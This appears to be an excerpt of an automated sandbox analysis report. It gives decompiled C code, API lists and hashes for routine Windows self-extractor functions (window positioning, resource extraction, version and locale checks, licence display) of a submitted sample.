                                                                                                                                                                                                    0x00fd2bbb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2bb8
                                                                                                                                                                                                    0x00fd2b28
                                                                                                                                                                                                    0x00fd2b2e
                                                                                                                                                                                                    0x00fd2b33
                                                                                                                                                                                                    0x00fd2b39
                                                                                                                                                                                                    0x00fd2b3c
                                                                                                                                                                                                    0x00fd2b3c
                                                                                                                                                                                                    0x00fd2b3e
                                                                                                                                                                                                    0x00fd2b3f
                                                                                                                                                                                                    0x00fd2b55
                                                                                                                                                                                                    0x00fd2b5d
                                                                                                                                                                                                    0x00fd2b64
                                                                                                                                                                                                    0x00fd2b64
                                                                                                                                                                                                    0x00fd2b7a
                                                                                                                                                                                                    0x00fd2b7f
                                                                                                                                                                                                    0x00fd2b81
                                                                                                                                                                                                    0x00fd2b81
                                                                                                                                                                                                    0x00fd2b84
                                                                                                                                                                                                    0x00fd2b84
                                                                                                                                                                                                    0x00fd2b86
                                                                                                                                                                                                    0x00fd2b87
                                                                                                                                                                                                    0x00fd2bbf
                                                                                                                                                                                                    0x00fd2bc1
                                                                                                                                                                                                    0x00fd2bc1
                                                                                                                                                                                                    0x00fd2b26
                                                                                                                                                                                                    0x00fd2bda
                                                                                                                                                                                                    0x00fd2bda
                                                                                                                                                                                                    0x00fd2be6
                                                                                                                                                                                                    0x00fd2be6
                                                                                                                                                                                                    0x00fd2bf8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00FD2AE6
                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 00FD2AF2
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00FD2B12
                                                                                                                                                                                                    • CharUpperA.USER32 ref: 00FD2B1E
                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 00FD2B55
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00FD2BD4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                    • Opcode ID: 1d277b9f290cfcc9e8aa53409f2808d22f1175e14eb47c5c03da96a04a42789e
                                                                                                                                                                                                    • Instruction ID: cdf7e66a27cef3e35aff9842840c702b07aee77be394e21d0a04d164c65cd35e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d277b9f290cfcc9e8aa53409f2808d22f1175e14eb47c5c03da96a04a42789e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 384127349041495EDB559F348C54AFD7B6B9FA6310F0C009BE8C287302DBB58E86EBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E00FD43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				struct tagRECT _v24;
                                                                                                                                                                                                    				struct tagRECT _v40;
                                                                                                                                                                                                    				struct HWND__* _v44;
                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                    				int _v52;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				int _v60;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                    				struct HWND__* _t63;
                                                                                                                                                                                                    				struct HWND__* _t67;
                                                                                                                                                                                                    				struct HWND__* _t68;
                                                                                                                                                                                                    				struct HDC__* _t69;
                                                                                                                                                                                                    				int _t72;
                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t63 = __edx;
                                                                                                                                                                                                    				_t29 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                    				_t68 = __edx;
                                                                                                                                                                                                    				_v44 = __ecx;
                                                                                                                                                                                                    				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                    				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                    				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                    				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                    				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                    				_t69 = GetDC(_v44);
                                                                                                                                                                                                    				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                    				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                    				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                    				_t56 = _v48;
                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                    				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                    				_t67 = 0;
                                                                                                                                                                                                    				if(_t72 >= 0) {
                                                                                                                                                                                                    					_t63 = _v52;
                                                                                                                                                                                                    					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                    						_t72 = _t63 - _t56;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t72 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                    				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                    				if(_t59 >= 0) {
                                                                                                                                                                                                    					_t63 = _v60;
                                                                                                                                                                                                    					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                    						_t59 = _t63 - _t53;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t59 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                    			}
























                                                                                                                                                                                                    0x00fd43d0
                                                                                                                                                                                                    0x00fd43d8
                                                                                                                                                                                                    0x00fd43df
                                                                                                                                                                                                    0x00fd43e6
                                                                                                                                                                                                    0x00fd43ec
                                                                                                                                                                                                    0x00fd43f1
                                                                                                                                                                                                    0x00fd4400
                                                                                                                                                                                                    0x00fd4403
                                                                                                                                                                                                    0x00fd440b
                                                                                                                                                                                                    0x00fd4420
                                                                                                                                                                                                    0x00fd4429
                                                                                                                                                                                                    0x00fd4437
                                                                                                                                                                                                    0x00fd4444
                                                                                                                                                                                                    0x00fd4447
                                                                                                                                                                                                    0x00fd444d
                                                                                                                                                                                                    0x00fd4454
                                                                                                                                                                                                    0x00fd445b
                                                                                                                                                                                                    0x00fd4460
                                                                                                                                                                                                    0x00fd4461
                                                                                                                                                                                                    0x00fd4467
                                                                                                                                                                                                    0x00fd446f
                                                                                                                                                                                                    0x00fd4473
                                                                                                                                                                                                    0x00fd4473
                                                                                                                                                                                                    0x00fd4463
                                                                                                                                                                                                    0x00fd4463
                                                                                                                                                                                                    0x00fd4463
                                                                                                                                                                                                    0x00fd447a
                                                                                                                                                                                                    0x00fd4481
                                                                                                                                                                                                    0x00fd4484
                                                                                                                                                                                                    0x00fd448a
                                                                                                                                                                                                    0x00fd4492
                                                                                                                                                                                                    0x00fd4496
                                                                                                                                                                                                    0x00fd4496
                                                                                                                                                                                                    0x00fd4486
                                                                                                                                                                                                    0x00fd4486
                                                                                                                                                                                                    0x00fd4486
                                                                                                                                                                                                    0x00fd44b8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FD43F1
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FD440B
                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00FD4423
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00FD442E
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00FD443A
                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00FD4447
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00FD44A2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                    • Opcode ID: fa0d0887519f04d49b6baf96c29dfdda0e5bebd77b5e909315e4b02f34eb0714
                                                                                                                                                                                                    • Instruction ID: cd86f16827f7777b930e638c07dd5ce22ecdf460e23b60a68a6a9507a54c4ad6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa0d0887519f04d49b6baf96c29dfdda0e5bebd77b5e909315e4b02f34eb0714
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5313E32E01119AFCB14CFB8DD899EEBBB6EB89310F19416AF805F3250DA306D459B64
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                    			E00FD6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				struct HINSTANCE__* _v36;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                    				struct HRSRC__* _t21;
                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				struct HINSTANCE__* _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                    				_t16 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                    				_t46 = 0;
                                                                                                                                                                                                    				_v32 = __ecx;
                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                    				_t36 = 1;
                                                                                                                                                                                                    				E00FD171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t51 = _t51 + 0x10;
                                                                                                                                                                                                    					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                                                                    						 *0xfd9124 = 0x80070714;
                                                                                                                                                                                                    						_t36 = _t46;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                    						_t44 = _t5;
                                                                                                                                                                                                    						_t40 = _t44;
                                                                                                                                                                                                    						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                    						_t47 = _t6;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t26 =  *_t40;
                                                                                                                                                                                                    							_t40 = _t40 + 1;
                                                                                                                                                                                                    						} while (_t26 != 0);
                                                                                                                                                                                                    						_t41 = _t40 - _t47;
                                                                                                                                                                                                    						_t46 = _t51;
                                                                                                                                                                                                    						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                    						 *0xfda288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                    						_t30 = _v32();
                                                                                                                                                                                                    						if(_t51 != _t51) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(_t45);
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							_t36 = 0;
                                                                                                                                                                                                    							FreeResource(??);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							FreeResource();
                                                                                                                                                                                                    							_v36 = _v36 + 1;
                                                                                                                                                                                                    							E00FD171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                    							_t46 = 0;
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					return E00FD6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                    			}






















                                                                                                                                                                                                    0x00fd6298
                                                                                                                                                                                                    0x00fd62a0
                                                                                                                                                                                                    0x00fd62a7
                                                                                                                                                                                                    0x00fd62ad
                                                                                                                                                                                                    0x00fd62af
                                                                                                                                                                                                    0x00fd62bb
                                                                                                                                                                                                    0x00fd62c3
                                                                                                                                                                                                    0x00fd62c4
                                                                                                                                                                                                    0x00fd633b
                                                                                                                                                                                                    0x00fd633b
                                                                                                                                                                                                    0x00fd6345
                                                                                                                                                                                                    0x00fd634d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd62da
                                                                                                                                                                                                    0x00fd62de
                                                                                                                                                                                                    0x00fd635f
                                                                                                                                                                                                    0x00fd6369
                                                                                                                                                                                                    0x00fd62e0
                                                                                                                                                                                                    0x00fd62e0
                                                                                                                                                                                                    0x00fd62e0
                                                                                                                                                                                                    0x00fd62e3
                                                                                                                                                                                                    0x00fd62e5
                                                                                                                                                                                                    0x00fd62e5
                                                                                                                                                                                                    0x00fd62e8
                                                                                                                                                                                                    0x00fd62e8
                                                                                                                                                                                                    0x00fd62ea
                                                                                                                                                                                                    0x00fd62eb
                                                                                                                                                                                                    0x00fd62ef
                                                                                                                                                                                                    0x00fd62f1
                                                                                                                                                                                                    0x00fd62f3
                                                                                                                                                                                                    0x00fd6302
                                                                                                                                                                                                    0x00fd6308
                                                                                                                                                                                                    0x00fd630d
                                                                                                                                                                                                    0x00fd6314
                                                                                                                                                                                                    0x00fd6314
                                                                                                                                                                                                    0x00fd6316
                                                                                                                                                                                                    0x00fd6319
                                                                                                                                                                                                    0x00fd6355
                                                                                                                                                                                                    0x00fd6357
                                                                                                                                                                                                    0x00fd631b
                                                                                                                                                                                                    0x00fd631b
                                                                                                                                                                                                    0x00fd6331
                                                                                                                                                                                                    0x00fd6334
                                                                                                                                                                                                    0x00fd6339
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6339
                                                                                                                                                                                                    0x00fd6319
                                                                                                                                                                                                    0x00fd636b
                                                                                                                                                                                                    0x00fd637d
                                                                                                                                                                                                    0x00fd637d
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD171E: _vsnprintf.MSVCRT ref: 00FD1750
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00FD51CA,00000004,00000024,00FD2F71,?,00000002,00000000), ref: 00FD62CD
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FD51CA,00000004,00000024,00FD2F71,?,00000002,00000000), ref: 00FD62D4
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FD51CA,00000004,00000024,00FD2F71,?,00000002,00000000), ref: 00FD631B
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00FD6345
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FD51CA,00000004,00000024,00FD2F71,?,00000002,00000000), ref: 00FD6357
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                    • String ID: UPDFILE%lu
                                                                                                                                                                                                    • API String ID: 2922116661-2329316264
                                                                                                                                                                                                    • Opcode ID: fe4b3b747c407a81e675f9698edb1d44cf1a059db20c63215f302b593e9191f0
                                                                                                                                                                                                    • Instruction ID: 97b08236f87db99913e1c0ac444bb363c8837acef48d7ca12f88367b90ebee70
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe4b3b747c407a81e675f9698edb1d44cf1a059db20c63215f302b593e9191f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D821F672A00219ABDB109FB4CC499BE7B7AFB44710B08011BF902E3341DB359D02ABE5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00FD681F(void* __ebx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                    				void* _v172;
                                                                                                                                                                                                    				int* _v176;
                                                                                                                                                                                                    				int _v180;
                                                                                                                                                                                                    				int _v184;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t36 = __ebx;
                                                                                                                                                                                                    				_t19 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                    				_t41 =  *0xfd81d8; // 0xfffffffe
                                                                                                                                                                                                    				_t43 = 0;
                                                                                                                                                                                                    				_v180 = 0xc;
                                                                                                                                                                                                    				_v176 = 0;
                                                                                                                                                                                                    				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                    					 *0xfd81d8 = 0;
                                                                                                                                                                                                    					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                    					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                    						_t41 =  *0xfd81d8; // 0xfffffffe
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t41 = 1;
                                                                                                                                                                                                    						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t31 = RegQueryValueExA(_v172, 0xfd1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                    							_t43 = _t31;
                                                                                                                                                                                                    							RegCloseKey(_v172);
                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t40 =  &_v176;
                                                                                                                                                                                                    								if(E00FD66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                    									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                    										 *0xfd81d8 = _t41;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L12;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00fd681f
                                                                                                                                                                                                    0x00fd682a
                                                                                                                                                                                                    0x00fd6831
                                                                                                                                                                                                    0x00fd6836
                                                                                                                                                                                                    0x00fd683c
                                                                                                                                                                                                    0x00fd683e
                                                                                                                                                                                                    0x00fd6848
                                                                                                                                                                                                    0x00fd6851
                                                                                                                                                                                                    0x00fd685d
                                                                                                                                                                                                    0x00fd6864
                                                                                                                                                                                                    0x00fd6876
                                                                                                                                                                                                    0x00fd693a
                                                                                                                                                                                                    0x00fd693a
                                                                                                                                                                                                    0x00fd687c
                                                                                                                                                                                                    0x00fd687e
                                                                                                                                                                                                    0x00fd6885
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd68d6
                                                                                                                                                                                                    0x00fd68f4
                                                                                                                                                                                                    0x00fd6900
                                                                                                                                                                                                    0x00fd6902
                                                                                                                                                                                                    0x00fd690a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd690c
                                                                                                                                                                                                    0x00fd690c
                                                                                                                                                                                                    0x00fd691c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd691e
                                                                                                                                                                                                    0x00fd6924
                                                                                                                                                                                                    0x00fd692b
                                                                                                                                                                                                    0x00fd6932
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd692b
                                                                                                                                                                                                    0x00fd691c
                                                                                                                                                                                                    0x00fd690a
                                                                                                                                                                                                    0x00fd6885
                                                                                                                                                                                                    0x00fd6876
                                                                                                                                                                                                    0x00fd6951

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00FD686E
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004A), ref: 00FD68A7
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00FD68CC
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00FD1140,00000000,?,?,0000000C), ref: 00FD68F4
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00FD6902
                                                                                                                                                                                                      • Part of subcall function 00FD66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00FD691A), ref: 00FD6741
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Control Panel\Desktop\ResourceLocale, xrefs: 00FD68C2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                    • API String ID: 3346862599-1109908249
                                                                                                                                                                                                    • Opcode ID: 4316d5b3574be315a9e14e87f728e00b6d4fec544e2d1238c4c3d8aa33c835bf
                                                                                                                                                                                                    • Instruction ID: d0f554052c036d2148477446d0f90e1c7ad158a3ae420e33b052e6b52c705af9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4316d5b3574be315a9e14e87f728e00b6d4fec544e2d1238c4c3d8aa33c835bf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26318131E012189FDB21EB61CC14BAAB77AFB45764F0801A7E949E2240DB309D86EF57
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD3A3F(void* __eflags) {
                                                                                                                                                                                                    				void* _t3;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t16 = "LICENSE";
                                                                                                                                                                                                    				_t1 = E00FD468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                    				 *0xfd8d4c = _t3;
                                                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                                                    					_t19 = _t16;
                                                                                                                                                                                                    					if(E00FD468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                    						if(lstrcmpA( *0xfd8d4c, "<None>") == 0) {
                                                                                                                                                                                                    							LocalFree( *0xfd8d4c);
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0xfd9124 = 0;
                                                                                                                                                                                                    							return 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t9 = E00FD6517(_t19, 0x7d1, 0, E00FD3100, 0, 0);
                                                                                                                                                                                                    						LocalFree( *0xfd8d4c);
                                                                                                                                                                                                    						if(_t9 != 0) {
                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0xfd9124 = 0x800704c7;
                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E00FD44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					LocalFree( *0xfd8d4c);
                                                                                                                                                                                                    					 *0xfd9124 = 0x80070714;
                                                                                                                                                                                                    					goto L2;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E00FD44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    				 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                    			}






                                                                                                                                                                                                    0x00fd3a46
                                                                                                                                                                                                    0x00fd3a57
                                                                                                                                                                                                    0x00fd3a5d
                                                                                                                                                                                                    0x00fd3a63
                                                                                                                                                                                                    0x00fd3a6a
                                                                                                                                                                                                    0x00fd3a91
                                                                                                                                                                                                    0x00fd3a9a
                                                                                                                                                                                                    0x00fd3ad8
                                                                                                                                                                                                    0x00fd3b13
                                                                                                                                                                                                    0x00fd3b19
                                                                                                                                                                                                    0x00fd3b1b
